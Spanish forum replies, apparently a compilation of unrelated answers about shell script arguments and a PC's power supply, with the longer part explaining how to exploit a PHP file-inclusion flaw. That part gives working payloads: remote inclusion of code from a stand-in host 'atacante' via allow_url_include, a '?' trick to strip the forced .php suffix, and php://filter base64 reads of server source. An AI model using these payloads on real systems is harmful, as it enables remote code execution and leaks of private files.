$1 = -u  y $2 = usuario

Los parametros que le pasas puedes utilizarlos con $1, $2, $3...

En que lenguaje?

Dónde miras lo que consume la gŕafica? Lo que he mirado yo pone 400W.  

Vale, eso es el mínimo necesario, no lo que consume.

No me hagas mucho caso porque no sé mucho de esto, pero estás seguro de que esa fuente de 500W es suficiente?

En qué PCI tienes enchufada la gráfica?

El null byte no se puede utilizar.

Con allow_url_include puedes incluir código php desde una url, por ejemplo:

include "http://atacante/code.txt";

Por lo tanto, no se trata de incluir http://localhost/r/r.php?pagina=text.txt?, sino http://atacante/code.txt y así ejecutar el código del atacante, que podría ser:

echo file_get_contents("archivo.txt");

Para evitar el .php del final basta con poner un ?: http://atacante/code.txt?

Finalmente quedaría así: http://localhost/r/r.php?pagina=http://atacante/code.txt?

include "http://atacante/code.txt?.php";

Con allow_url_include no puedes usar %00, pero sí poner urls y ejecutar php ajeno, así es fácil ver archivo.txt
Si tienes algún problema con el .php del final, con poner un ?, el resto se ignora:

http://ejemplo.com/ejemplo.txt? quedaría http://ejemplo.com/ejemplo.txt?.php y se ejecuta el código que hay en ejemplo.txt

Con php://filter puedes ver el código de los php en el servidor y buscar otra vulnerabilidad que te deje ver archivo.txt

php://filter/convert.base64-encode/resource=index quedaría php://filter/convert.base64-encode/resource=index.php por lo que no puedes ver el .txt directamente, pero sí los .php.

Puedes buscar, alternative to null byte en google mismo y sale bastante información. Otra opción es que esté allow_url_include activado, o con php://filter podrías ver los archivos php en base64 por ejemplo y así buscar otra vulnerabilidad.